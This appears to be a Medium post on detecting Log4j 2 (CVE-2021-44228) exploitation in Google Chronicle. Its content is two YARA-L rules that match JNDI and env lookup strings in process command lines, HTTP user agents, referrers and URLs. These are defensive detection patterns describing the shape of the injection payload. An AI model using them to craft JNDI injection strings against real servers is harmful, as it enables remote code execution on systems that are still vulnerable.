Detecting and responding to Apache “Log4j 2” using Google Chronicle

Raw Log Search

Historical Raw Log Search Across The Enterprise

Detection Rules

rule cve_2021_44228_execution {meta:tactic = “TA0002”description = “Identifies process execution using JNDI strings.”events:$event.metadata.event_type = “PROCESS_LAUNCH”$event.target.process.command_line = /.*\$\{jndi\:(ldap|rmi|ldaps|dns)\:.*\}.*/ nocase$event.principal.hostname = $hostnamecondition:$event}
rule cve_2021_44228_http {meta:tactic = "TA0002"technique = "T1059"description = "Identifies JNDI strings in network user agents or URIs."reference = "https://www.lunasec.io/docs/blog/log4j-zero-day/"events:$event.metadata.event_type = "NETWORK_HTTP"($event.network.http.user_agent = "({jndi:.*}|{env:.*}|:j}.*{)" or
$event.network.http.referral_url = "({jndi:.*}|{env:.*}|:j}.*{)" or
$event.target.url = "({jndi:.*}|{env:.*}|:j}.*{)")condition:$event}

Identify Low Prevalence Events

Low prevalence destination Investigation in Chronicle

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Registration Required: How To Improve Office Security in 5 Easy Steps

Kernel Exploitation

The Current and the Future States of DNS Security (2020)

The path to secure DNS

It’s Aleo!

Weekly Summary

VishwaCTF-22 => John the rocker (Cryptography)

NewsCrypto App V2 Release

User Accounts Not Requiring Passwords

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Chronicle

Chronicle

More from Medium

Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump

Log4j RCE — An analysis and comparison of Software Composition Analysis tools in the market

Security Analyst Diaries: Detecting GCP CIS control violations with native GCP Cloud Audit Logging…

How To SOAR — Avoid complication while simplification